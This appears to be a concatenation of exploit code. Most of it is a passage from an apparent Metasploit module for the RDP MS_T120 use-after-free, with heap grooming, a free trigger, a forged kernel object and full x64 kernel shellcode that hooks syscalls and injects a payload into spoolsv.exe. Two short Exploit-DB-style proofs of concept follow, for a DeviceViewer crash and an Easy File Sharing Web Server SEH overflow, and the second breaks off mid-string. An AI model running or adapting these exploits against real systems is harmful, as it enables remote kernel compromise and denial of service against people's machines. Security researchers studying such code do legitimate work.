      ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
    ]

    @mst120_chan_id = 1004 + chans.length - 1

    unless rdp_negotiate_security(chans, server_selected_proto)
      fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
    end

    rdp_establish_session

    rdp_dispatch_loop
  end

private

  # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
  # received on a channel, and this is when we need to kick off our exploit.
  def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
    # We have to do the default behaviour first.
    super(pkt, user, chan_id, flags, data)

    groom_size = datastore['GROOMSIZE']
    pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
    groom_chan_count = datastore['GROOMCHANNELCOUNT']

    payloads = create_payloads(pool_addr)

    print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")

    target_channel_id = chan_id + 1

    spray_buffer = create_exploit_channel_buffer(pool_addr)
    spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
    free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80

    print_status("Surfing channels ...")
    rdp_send(spray_channel * 1024)
    rdp_send(free_trigger)

    chan_surf_size = 0x421
    spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
    chan_surf_packet = spray_channel * spray_packets
    chan_surf_count  = chan_surf_size / spray_packets

    chan_surf_count.times do
      rdp_send(chan_surf_packet)
    end

    print_status("Lobbing eggs ...")

    groom_mb = groom_size * 1024 / payloads.length

    groom_mb.times do
      tpkts = ''
      for c in 0..groom_chan_count
        payloads.each do |p|
          tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
        end
      end
      rdp_send(tpkts)
    end

    # Terminating and disconnecting forces the USE
    print_status("Forcing the USE of FREE'd object ...")
    rdp_terminate
    rdp_disconnect
  end

  # Helper function to create the kernel mode payload and the usermode payload with
  # the egg hunter prefix.
  def create_payloads(pool_address)
    begin
      [kernel_mode_payload, user_mode_payload].map { |p|
        [
          pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg
          p
        ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")
      }
    rescue => ex
      print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")
    end
  end

  def assemble_with_fixups(asm)
    # Rewrite all instructions of form 'lea reg, [rel label]' as relative
    # offsets for the instruction pointer, since metasm's 'ModRM' parser does
    # not grok that syntax.
    lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/
    asm.gsub!(lea_rel) do |match|
      match = "lea #{$1}, [rip + #{$2}]"
    end

    # metasm encodes all rep instructions as repnz
    # https://github.com/jjyg/metasm/pull/40
    asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')

    encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded

    # Fixup above rewritten instructions with the relative label offsets
    encoded.reloc.each do |offset, reloc|
      target = reloc.target.to_s
      if encoded.export.key?(target)
        # Note: this assumes the address we're fixing up is at the end of the
        # instruction. This holds for 'lea' but if there are other fixups
        # later, this might need to change to account for specific instruction
        # encodings
        if reloc.type == :i32
          instr_offset = offset + 4
        elsif reloc.type == :i16
          instr_offset = offset + 2
        end
        encoded.fixup(target => encoded.export[target] - instr_offset)
      else
        raise "Unknown symbol '#{target}' while resolving relative offsets"
      end
    end
    encoded.fill
    encoded.data
  end

  # The user mode payload has two parts. The first is an egg hunter that searches for
  # the kernel mode payload. The second part is the actual payload that's invoked in
  # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel
  # and user mode payloads around the heap in different packets because we don't have
  # enough space to put them both in the same chunk. Given that code exec can result in
  # landing on the user land payload, the egg is used to go to a kernel payload.
  def user_mode_payload

    asm = %Q^
_start:
    lea rcx, [rel _start]
    mov r8, 0x#{KERNELMODE_EGG.to_s(16)}
_egg_loop:
    sub rcx, 0x#{CHUNK_SIZE.to_s(16)}
    sub rax, 0x#{CHUNK_SIZE.to_s(16)}
    mov rdx, [rcx - 8]
    cmp rdx, r8
    jnz _egg_loop
    jmp rcx
    ^
    egg_loop = assemble_with_fixups(asm)

    # The USERMODE_EGG is required at the start as well, because the exploit code
    # assumes the tag is there, and jumps over it to find the shellcode.
    [
      USERMODE_EGG,
      egg_loop,
      USERMODE_EGG,
      payload.raw
    ].pack('<Qa*<Qa*')
  end

  def kernel_mode_payload

    # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
    #
    # This shellcode was written originally for eternalblue exploits
    # eternalblue_exploit7.py and eternalblue_exploit8.py
    #
    # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
    #
    # Note:
    # - The userland shellcode is run in a new thread of system process.
    #     If userland shellcode causes any exception, the system process get killed.
    # - On idle target with multiple core processors, the hijacked system call
    #     might take a while (> 5 minutes) to get called because the system
    #     call may be called on other processors.
    # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.
    #     This is ok because some Windows functions do not require a shadow stack.
    # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
    #     Note: the Windows 8 version macros are removed below
    # - The userland payload MUST be appened to this shellcode.
    #
    # References:
    # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
    # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

    data_kapc_offset           = 0x10
    data_nt_kernel_addr_offset = 0x8
    data_origin_syscall_offset = 0
    data_peb_addr_offset       = -0x10
    data_queueing_kapc_offset  = -0x8
    hal_heap_storage           = 0xffffffffffd04100

    # These hashes are not the same as the ones used by the
    # Block API so they have to be hard-coded.
    createthread_hash              = 0x835e515e
    keinitializeapc_hash           = 0x6d195cc4
    keinsertqueueapc_hash          = 0xafcc4634
    psgetcurrentprocess_hash       = 0xdbf47c78
    psgetprocessid_hash            = 0x170114e1
    psgetprocessimagefilename_hash = 0x77645f3f
    psgetprocesspeb_hash           = 0xb818b848
    psgetthreadteb_hash            = 0xcef84c3e
    spoolsv_exe_hash               = 0x3ee083d8
    zwallocatevirtualmemory_hash   = 0x576e99ea

    asm = %Q^
shellcode_start:
    nop
    nop
    nop
    nop
    ; IRQL is DISPATCH_LEVEL when got code execution

    push rbp

    call set_rbp_data_address_fn

    ; read current syscall
    mov ecx, 0xc0000082
    rdmsr
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done

    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+#{data_origin_syscall_offset}], eax
    je _hook_syscall

    ; save original syscall
    mov dword [rbp+#{data_origin_syscall_offset}+4], edx
    mov dword [rbp+#{data_origin_syscall_offset}], eax

    ; first time on the target
    mov byte [rbp+#{data_queueing_kapc_offset}], 0

_hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    wrmsr

_setup_syscall_hook_done:
    pop rbp

;--------------------- HACK crappy thread cleanup --------------------
; This code is effectively the same as the epilogue of the function that calls
; the vulnerable function in the kernel, with a tweak or two.

    ; TODO: make the lock not suck!!
    mov     rax, qword [gs:0x188]
    add     word [rax+0x1C4], 1       ; KeGetCurrentThread()->KernelApcDisable++
    lea     r11, [rsp+0b8h]
    xor     eax, eax
    mov     rbx, [r11+30h]
    mov     rbp, [r11+40h]
    mov     rsi, [r11+48h]
    mov     rsp, r11
    pop     r15
    pop     r14
    pop     r13
    pop     r12
    pop     rdi
    ret

;--------------------- END HACK crappy thread cleanup

;========================================================================
; Find memory address in HAL heap for using as data area
; Return: rbp = data address
;========================================================================
set_rbp_data_address_fn:
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]

    ; ------ HACK rbp wasnt valid!

    mov rbp, #{hal_heap_storage}    ; TODO: use some other buffer besides HAL heap??

    ; --------- HACK end rbp

_set_rbp_data_address_fn_next:
    ;shr rbp, 12
    ;shl rbp, 12
    ;sub rbp, 0x70   ; for KAPC struct too
    ret

    ;int 3
    ;call $+5
    ;pop r13
syscall_hook:
    swapgs
    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]

    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    mov rax, [rbp+#{data_origin_syscall_offset}]
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl
    jnz _syscall_hook_done

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+#{data_origin_syscall_offset}]
    mov edx, [rbp+#{data_origin_syscall_offset}+4]
    wrmsr

    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli

_syscall_hook_done:
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax
    ret

r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ;======================================
    ; find nt kernel address
    ;======================================
    mov r15, qword [rbp+#{data_origin_syscall_offset}]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

_x64_find_nt_walk_page:
    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page

    ; save nt address for using in KernelApcRoutine
    mov [rbp+#{data_nt_kernel_addr_offset}], r15

    ;======================================
    ; get current EPROCESS and ETHREAD
    ;======================================
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    mov edi, #{psgetcurrentprocess_hash}
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS

    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS

    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov edi, #{psgetprocessimagefilename_hash}
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename


    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)

    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
_find_eprocess_threadlist_offset_win7:
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead

    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================

    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8

    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
_find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]

    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!

    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)


    ;======================================
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov edi, #{psgetprocessid_hash}
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)


    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
    ;======================================
    ; check process name


    xor eax, eax      ; HACK to exit earlier if process not found

_find_target_process_loop:
    lea rsi, [rcx+rbx]

    push rax
    call calc_hash
    cmp eax, #{spoolsv_exe_hash}  ; "spoolsv.exe"
    pop rax
    jz found_target_process

;---------- HACK PROCESS NOT FOUND start -----------
    inc rax
    cmp rax, 0x300      ; HACK not found!
    jne _next_find_target_process
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+#{data_queueing_kapc_offset}], cl

    jmp _r3_to_r0_done

;---------- HACK PROCESS NOT FOUND end -----------

_next_find_target_process:
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop


found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ;======================================
    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov edi, #{psgetprocesspeb_hash}
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+#{data_peb_addr_offset}], rax


    ;======================================
    ; iterate ThreadList until KeInsertQueueApc() success
    ;======================================
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead


    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread

    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

_insert_queue_apc_loop:
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]

    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD

    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    mov edi, #{psgetthreadteb_hash}
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop

    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+#{data_kapc_offset}]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    mov edi, #{keinitializeapc_hash}
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+#{data_kapc_offset}]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    mov edi, #{keinsertqueueapc_hash}
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop

    mov rax, [rbp+#{data_kapc_offset}+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done

    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

_insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

_r3_to_r0_done:
    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15
    ret

;========================================================================
; Call function in specific module
;
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
;========================================================================
win_api_direct:
    call get_proc_addr
    jmp rax


;========================================================================
; Get function address in specific module
;
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
;========================================================================
get_proc_addr:
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

_get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

_get_proc_addr_finish:
    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx
    ret

;========================================================================
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
;
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
;========================================================================
calc_hash:
    push rdx
    xor eax, eax
    cdq
_calc_hash_loop:
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx
    ret


; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
;
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
kernel_kapc_routine:
    push rbp
    push rbx
    push rdi
    push rsi
    push r15

    mov rbp, [r8]       ; *NormalContext is our data area pointer

    mov r15, [rbp+#{data_nt_kernel_addr_offset}]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9

    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    ;======================================
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    mov edi, #{zwallocatevirtualmemory_hash}
    call win_api_direct
    add rsp, 0x30

    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit

    ;======================================
    ; copy userland payload
    ;======================================
    mov rdi, [rsi]

;--------------------------- HACK IN EGG USER ---------

    push rdi

    lea rsi, [rel shellcode_start]
    mov rdi, 0x#{USERMODE_EGG.to_s(16)}

  _find_user_egg_loop:
      sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
      mov rax, [rsi - 8]
      cmp rax, rdi
      jnz _find_user_egg_loop

  _inner_find_user_egg_loop:
      inc rsi
      mov rax, [rsi - 8]
      cmp rax, rdi
      jnz _inner_find_user_egg_loop

    pop rdi
;--------------------------- END HACK EGG USER ------------

    mov ecx, 0x380  ; fix payload size to 0x380 bytes

    rep movsb

    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+#{data_peb_addr_offset}]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

    ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    ;mov rbx, rsi    ; use rbx for iterating thread
_find_kernel32_dll_loop:
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop

    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop

    ;int3
    mov r15, [rax+0x20]
    mov edi, #{createthread_hash}
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax

_kernel_kapc_routine_exit:
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+#{data_queueing_kapc_offset}], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx

    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret

userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret

userland_payload:
    ^

    [
      KERNELMODE_EGG,
      assemble_with_fixups(asm)
    ].pack('<Qa*')
  end

  def create_free_trigger(chan_user_id, chan_id)
    # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)
    vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")
    # The extra bytes on the end of the body is what causes the bad things to happen
    body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22
    rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)
  end

  def create_exploit_channel_buffer(target_addr)
    overspray_addr = target_addr + 0x2000
    shellcode_vtbl = target_addr + HEADER_SIZE
    magic_value1 = overspray_addr + 0x810
    magic_value2 = overspray_addr + 0x48
    magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE

    # first 0x38 bytes are used by DATA PDU packet
    # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE
    # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm
    [
      [
        # SystemResourceList (2 pointers, each 8 bytes)
        # Pointer to OWNER_ENTRY (8 bytes)
        # ActiveCount (SHORT, 2 bytes)
        # Flag (WORD, 2 bytes)
        # Padding (BYTE[4], 4 bytes) x64 only
        0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
        0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
        magic_value2, # OwnerThread (ULONG, 8 bytes)
        magic_value2, # TableSize (ULONG, 8 bytes)
        0x0, # ActiveEntries (DWORD, 4 bytes)
        0x0, # ContenttionCount (DWORD, 4 bytes)
        0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
        0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
        0x0, # Reserved2 (PVOID, 8 bytes) x64 only
        magic_value2, # Address (PVOID, 8 bytes)
        0x0, # SpinLock (UINT_PTR, 8 bytes)
      ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
      [
        magic_value2, # SystemResourceList (2 pointers, each 8 bytes)
        magic_value2, # --------------------
        0x0, # Pointer to OWNER_ENTRY (8 bytes)
        0x0, # ActiveCount (SHORT, 2 bytes)
        0x0, # Flag (WORD, 2 bytes)
        0x0, # Padding (BYTE[4], 4 bytes) x64 only
        0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
        0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
        magic_value2, # OwnerThread (ULONG, 8 bytes)
        magic_value2, # TableSize (ULONG, 8 bytes)
        0x0, # ActiveEntries (DWORD, 4 bytes)
        0x0, # ContenttionCount (DWORD, 4 bytes)
        0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
        0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
        0x0, # Reserved2 (PVOID, 8 bytes) x64 only
        magic_value2, # Address (PVOID, 8 bytes)
        0x0, # SpinLock (UINT_PTR, 8 bytes)
      ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
      [
        0x1F, # ClassOffset (DWORD, 4 bytes)
        0x0, # bindStatus (DWORD, 4 bytes)
        0x72, # lockCount1 (QWORD, 8 bytes)
        magic_value3, # connection (QWORD, 8 bytes)
        shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)
        0x5, # channelClass (DWORD, 4 bytes)
"MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes)
        0x1F, # channelIndex (DWORD, 4 bytes)
        magic_value1, # channels (QWORD, 8 bytes)
        magic_value1, # connChannelsAddr (POINTER, 8 bytes)
        magic_value1, # list1 (QWORD, 8 bytes)
        magic_value1, # list1 (QWORD, 8 bytes)
        magic_value1, # list2 (QWORD, 8 bytes)
        magic_value1, # list2 (QWORD, 8 bytes)
        0x65756c62, # inputBufferLen (DWORD, 4 bytes)
        0x7065656b, # inputBufferLen (DWORD, 4 bytes)
        magic_value1, # connResrouce (QWORD, 8 bytes)
        0x65756c62, # lockCount158 (DWORD, 4 bytes)
        0x7065656b, # dword15C (DWORD, 4 bytes)
      ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')
    ].join('')
  end

end

#!/usr/bin/python

# Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7

# Steps to reproduce:
#   1. Generate a malicious payload via the POC
#   2. In the Sricam application create a new user
#   3. When creating a new user, set the username as the malicious payload
#   4. Observe a program DOScrash

payload = "A" * 5000

try:
    evilCreate =open("exploit.txt","w")
    print("""
    DeviceViewer 3.12.0.1 DOS exploit POC
    Author: Nu11pwn
""")
    print("[x] Creating malicious file")
    evilCreate.write(payload)
    evilCreate.close()
    print("[x] Malicious file create")
    print("[x] When creating a new user, set the username to the file contents")
    print("[x] Watch the program crash")
except:
    print("[!] File failed to be created")

#!/usr/bin/python

# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 7

# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow
#                  by creating a malicious username, this exploit POC will create a malicious text file
#                  with the contents to execute arbitrary code.
# Author : Nu11pwn

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
